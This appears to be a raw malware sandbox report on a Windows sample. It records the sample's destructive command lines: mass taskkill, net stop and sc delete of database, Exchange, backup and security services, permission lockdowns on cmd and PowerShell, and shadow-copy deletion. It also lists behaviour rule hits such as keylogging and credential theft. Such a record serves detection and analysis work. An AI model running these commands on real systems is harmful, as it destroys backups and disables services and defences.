cmdline | cacls C:\Windows\system32\mshta.exe /e /d mssqlserver |
cmdline | takeown /f C:\Windows\system32\mshta.exe /a |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g system:r |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service" |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d mssqlserver |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
cmdline | takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat C:\Users\test22\AppData\Local\Temp\kill$.exe" |
cmdline | cacls C:\Windows\system32\mshta.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system |
cmdline | cacls C:\Windows\system32\cmd.exe /g Administrators:f |
cmdline | takeown /f C:\Windows\system32\cmd.exe /a |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\mshta.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d system |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress |
cmdline | cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM 
K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM 
Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T" |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sqlbrowser.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nginx.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "benetns.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "beremote.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "TeamViewer.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "node.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ssms.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vm-agent.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "bengine.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "httpd.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCenter.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sqlwriter.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "pg_ctl.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RemoteAssistProcess.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "TNSLSNR.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "VirtualBox.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SecureCRT.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "GNAupdaemon.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rdm.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tv_x64.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Att.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ScanFrm.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "baidunetdisk.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "TeamViewer_Service.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msftesql.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vmtoolsd.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RavTray.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "softmgrlite.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "reportingservicesservice.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RAVCp164.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "notepad++.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vm-tray.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "VBoxSDS.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "abs_deployer.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sshd.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SecureCRTPortable.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "VBoxSVC.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "pvlsvr.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "d_manage.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "oracle.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "java.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rcrelay.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sqlservr.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RsTray.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "fdlauncher.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SogouImeBroker.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "fdhost.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SyncBaseSvr.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "eSightService.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "bedbg.exe") |
section | {u'size_of_data': u'0x0000b200', u'virtual_address': u'0x00022000', u'entropy': 7.984826702386807, u'name': u'.rsrc', u'virtual_size': u'0x0000b048'} | entropy | 7.98482670239 | description | A section with a high entropy has been found | |||||||||
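entropy | 0.275541795666 | description | Overall entropy of this PE file is high (the value shown appears to be the fraction of section data held in high-entropy sections, not a bits-per-byte figure) |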
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a Windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Possibly employs anti-virtualization techniques | rule | vmdetect | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | AntiVM checks for VMWare | rule | antivm_vmware | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications over DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP |
cmdline | net stop VMUSBArbService |
cmdline | sc delete OracleOraDb11g_home1TNSListener |
cmdline | sc delete ADWS |
cmdline | sc delete apachezt |
cmdline | sc delete CIS |
cmdline | taskkill /IM fdlauncher.exe /F |
cmdline | taskkill /IM wrapper.exe /F |
cmdline | sc delete vmware-converter-worker |
cmdline | cacls C:\Windows\system32\net.exe /e /d system |
cmdline | sc delete RTCAVMCU |
cmdline | cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA" |
cmdline | cacls C:\Windows\system32\net.exe /e /d SERVICE |
cmdline | sc delete "SyncBASE Service" |
cmdline | sc delete BackupExecManagementService |
cmdline | net stop MSExchangeSubmission |
cmdline | taskkill /IM iexplore.exe /F |
cmdline | cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM 
notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F" |
cmdline | net stop MSExchangeFrontEndTransport |
cmdline | net stop MSExchangeDelivery |
cmdline | sc delete MSSQL$SQL2008 |
cmdline | taskkill /IM tv_w32.exe /F |
cmdline | sc delete qemu-ga |
cmdline | sc delete "XT800Service_Personal" |
cmdline | C:\Windows\System32\cmd /c "C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat C:\Users\test22\AppData\Local\Temp\kill$.exe" |
cmdline | sc delete RtcQms |
cmdline | net stop MSExchangeADTopology |
cmdline | cacls C:\Windows\SysWOW64\net.exe /g Administrators:f |
cmdline | sc delete MSMQ |
cmdline | taskkill /IM vm-tray.exe /F |
cmdline | sc delete "ZTE USBIP Client Guard" |
cmdline | sc delete "ZTE FileTranS" |
cmdline | net stop ServiceMid |
cmdline | sc delete VisualSVNServer |
cmdline | sc delete GPSLoginSvr |
cmdline | sc delete U8DispatchService |
cmdline | taskkill /IM softmgrlite.exe /F |
cmdline | net stop VMnetDHCP |
cmdline | sc delete VGAuthService |
cmdline | sc delete TxQBService |
cmdline | net stop RapidRecoveryAgent |
cmdline | taskkill /IM TeamViewer_Service.exe /F |
cmdline | net stop VMwareHostd |
cmdline | net stop xenlite |
cmdline | net stop iNethinkSQLBackupSvc |
cmdline | sc delete secbizsrv |
cmdline | sc delete CloudExchangeService |
cmdline | sc delete SQLWriter |
cmdline | net stop MSExchangeDagMgmt |
cmdline | sc delete U8KeyManagePool |
cmdline | sc delete QQCertificateService |
file | C:\Users\test22\AppData\Local\Temp\::恢复cmd默认关联 |
cmdline | vssadmin delete shadows /all /quiet |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | cacls C:\Users\Public /e /d "network service" |
cmdline | cacls C:\Windows\system32\net1.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g Administrators:r |
cmdline | cacls C:\Users\Public /g Administrators:f |
